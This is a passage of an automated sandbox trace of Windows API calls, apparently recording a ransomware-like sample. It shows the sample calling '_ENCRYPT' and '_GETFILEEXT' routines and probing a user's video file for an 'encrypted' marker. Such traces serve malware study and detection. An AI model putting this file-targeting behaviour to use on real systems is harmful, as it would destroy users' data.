HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4") returned 75 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.727] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0043.727] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.728] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.729] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.729] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.730] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.731] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0043.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ca18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.731] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.731] CloseHandle (hObject=0x128) returned 1 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.732] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.732] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.732] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.732] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.732] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.732] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.733] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.733] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.733] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.733] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.733] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.733] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.733] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c13a20, ftCreationTime.dwHighDateTime=0x1d5b7f0, ftLastAccessTime.dwLowDateTime=0xdc131530, ftLastAccessTime.dwHighDateTime=0x1d5bf98, ftLastWriteTime.dwLowDateTime=0xdc131530, ftLastWriteTime.dwHighDateTime=0x1d5bf98, nFileSizeHigh=0x0, nFileSizeLow=0x12854, dwReserved0=0x0, dwReserved1=0x777648, cFileName="u373x4noWFcnJ.mp4", cAlternateFileName="U373X4~1.MP4")) returned 0x7c20c0 [0043.735] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.735] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.735] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9c13a20, ftCreationTime.dwHighDateTime=0x1d5b7f0, ftLastAccessTime.dwLowDateTime=0xdc131530, ftLastAccessTime.dwHighDateTime=0x1d5bf98, ftLastWriteTime.dwLowDateTime=0xdc131530, ftLastWriteTime.dwHighDateTime=0x1d5bf98, nFileSizeHigh=0x0, nFileSizeLow=0x12854, dwReserved0=0x0, dwReserved1=0x777648, cFileName="u373x4noWFcnJ.mp4", cAlternateFileName="U373X4~1.MP4")) returned 0x7c20c0 [0043.735] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.735] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.735] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\u373x4noWFcnJ.mp4\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.736] 